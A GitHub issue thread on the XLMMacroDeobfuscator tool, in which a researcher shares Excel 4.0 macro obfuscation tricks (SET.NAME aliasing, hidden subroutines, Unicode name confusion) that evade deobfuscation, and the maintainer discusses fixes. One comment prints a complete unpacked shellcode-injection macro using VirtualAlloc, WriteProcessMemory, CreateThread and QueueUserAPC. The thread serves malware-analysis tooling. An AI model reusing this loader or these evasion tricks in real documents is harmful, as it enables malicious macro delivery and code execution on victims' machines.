Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Named function invocations can break deobfuscation #40

Open
michaelweber opened this issue May 26, 2020 · 9 comments
Open

Named function invocations can break deobfuscation #40

michaelweber opened this issue May 26, 2020 · 9 comments
Assignees
Labels
enhancement New feature or request

Comments

@michaelweber
Copy link

Macro sheets allow Excel to replicate the effect of a RUN() invocation by defining a name and then referencing it in a sheet by appending () to the name.

For example:

=SET.NAME("InvokeMe",B1)
=InvokeMe()

is identical to calling RUN(B1). You can chain these expressions together as well, for example:

=SET.NAME("IndirectFunction","=B1")
=SET.NAME("IndirectInvocation",EVALUATE("IndirectFunction"))
=IndirectInvocation()

will also replicate calling RUN(B1). It looks like the invocation of a name and treating it as a RUN() expression hasn't been added to the grammar for the tool yet. Here's a small PoC for both of these cases that will help if maldoc authors start abusing this.

setname-obfuscation.xls.zip

@DissectMalware
Copy link
Owner

DissectMalware commented May 27, 2020

Interesting. I will add these functions. No need to update the grammar I suppose

SET.NAME is used to define a name...

SET.NAME is partially implemented

@DissectMalware DissectMalware added the enhancement New feature or request label May 27, 2020
@DissectMalware DissectMalware self-assigned this May 27, 2020
@michaelweber
Copy link
Author

Generated a new sample based on an upcoming Macrome release - it's a wrapped up version of EXCELntDonut with some obfuscation thrown in. There's a small amount of using the SET.NAME aliasing from defining a statement like varName=123, which may or may not work. The "final" macro after unpacking through all the CHAR() statements looks like:

=GOTO($A$2)
=GOTO($A$3)
=GOTO($A$4)
=GOTO($A$5)
=GOTO($A$6)
=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)
=REGISTER("Kernel32","WriteProcessMemory","JJJCJJ","WProcessMemory",,1,9)
=REGISTER("Kernel32","CreateThread","JJJJJJJ","CThread",,1,9)
=IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))),GOTO($A$10),GOTO($A$21))
=Valloc(0,65536,4096,64)
šœƒ=$B$1
=SET.VALUE($D$1,0)
=WHILE(šœƒ<>"excel")
=SET.VALUE($D$2,LEN(šœƒ))
=WProcessMemory(-1,$A$10+($D$1*255),šœƒ,LEN(šœƒ),0)
=SET.VALUE($D$1,$D$1+1)
šœƒ=ABSREF("R[1]C",šœƒ)
=NEXT()
=CThread(0,0,$A$10,0,0,0)
=HALT()
1342439424
0
=WHILE($A$22=0)
=SET.VALUE($A$22,Valloc($A$21,65536,12288,64))
=SET.VALUE($A$21,$A$21+262144)
=NEXT()
=REGISTER("Kernel32","RtlCopyMemory","JJCJ","RTL",,1,9)
=REGISTER("Kernel32","QueueUserAPC","JJJJ","Queue",,1,9)
=REGISTER("ntdll","NtTestAlert","J","Go",,1,9)
šœƒ=$C$1
=SET.VALUE($D$1,0)
=WHILE(šœƒ<>"EXCEL")
=SET.VALUE($D$2,LEN(šœƒ))
=RTL($A$22+($D$1*10),šœƒ,LEN(šœƒ))
=SET.VALUE($D$1,$D$1+1)
šœƒ=ABSREF("R[1]C",šœƒ)
=NEXT()
=Queue($A$22,-2,0)
=Go()
=SET.VALUE($A$22,0)
=HALT()

As an added "treat", the cells that are built contain raw binary strings rather than wrapping them as CHAR(). It looks like XLMMacroDeobfuscator handles this fine (though it does play a bunch of console alerts as it prints things out which tends to slow down the printing rate) but this may slightly frustrate some of the binary dumping.

excelntdonut-macrome.xls.zip

@michaelweber
Copy link
Author

Generated an alternate document which can also cause some issues by abusing user defined functions combined with variables set using SET.NAME.

By hiding a subroutine in the sheet somewhere else (it can be simple like, =RETURN(CHAR(var))), we can fake pass an argument to the subroutine and invoke it by making a call like:

=IF(SET.NAME("var",73),InvokeChar(),)

Which is identical to =CHAR(73).

Right now this sort of approach will not be emulated, so once the GOTO() is reached, there's no content shown.

charsub-method.xls.zip

@michaelweber
Copy link
Author

Here's a slightly more refined version of the character substitution approach. This time the variables used take advantage of some unicode silliness in Excel. From the Excel UI, a cell looks like:

Some example cells

I can't actually copy paste the content out of Excel directly since there are null bytes in the formula, and it will truncate at those bytes.

charsub-unicode-name-magic.zip

@DissectMalware
Copy link
Owner

Generated an alternate document which can also cause some issues by abusing user defined functions combined with variables set using SET.NAME.

By hiding a subroutine in the sheet somewhere else (it can be simple like, =RETURN(CHAR(var))), we can fake pass an argument to the subroutine and invoke it by making a call like:

=IF(SET.NAME("var",73),InvokeChar(),)

Which is identical to =CHAR(73).

Right now this sort of approach will not be emulated, so once the GOTO() is reached, there's no content shown.

charsub-method.xls.zip

This is addressed in v0.1.5 (currently on Master branch)

@michaelweber
Copy link
Author

Uploading a sample which takes advantage of some more Unicode ridiculous-ness involving Excel's magic treatment of ḁ (U+1E01) 1E 01 and A (U+0041) - ◌̥ (U+0325) 00 41 03 25 as the same character for name usages.

unicode_decomposition.xls.zip

@DissectMalware
Copy link
Owner

That make sense to be honest. The same for À (can be represented with two characters in ASCII or one unicode)

@michaelweber
Copy link
Author

Here's a refinement of that abuse in a different way that could be used by attackers to obscure which argument is being passed to a function when performing analysis. In the sample below each cell uses an AND statement to execute two SET.NAME calls before invoking the user defined function. One SET.NAME sets the value to be used, the other sets a decoy value using a slightly different string that is only different at the byte level (it's imperceptible to the eye). It's randomized if the first or second SET.NAME value sets the correct argument each cell.

image

unicode_specification_abuse.xls.zip

@michaelweber
Copy link
Author

Yeah, the capitalization is pretty reasonable - the issue is when there's sort of uneven handling of stuff like unicode Whitespace characters or unicode characters that are just ignored. Ex:

unicode_name_confusion_adjusted_for_endianness

The fact that the Lbl record string and "real" arg string are considered to be a match, but the "decoy" arg string is not makes me wonder just how much of this behavior is following the Unicode specification vs a series of arbitrary edge case handling.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
enhancement New feature or request
Projects
None yet
Development

No branches or pull requests

2 participants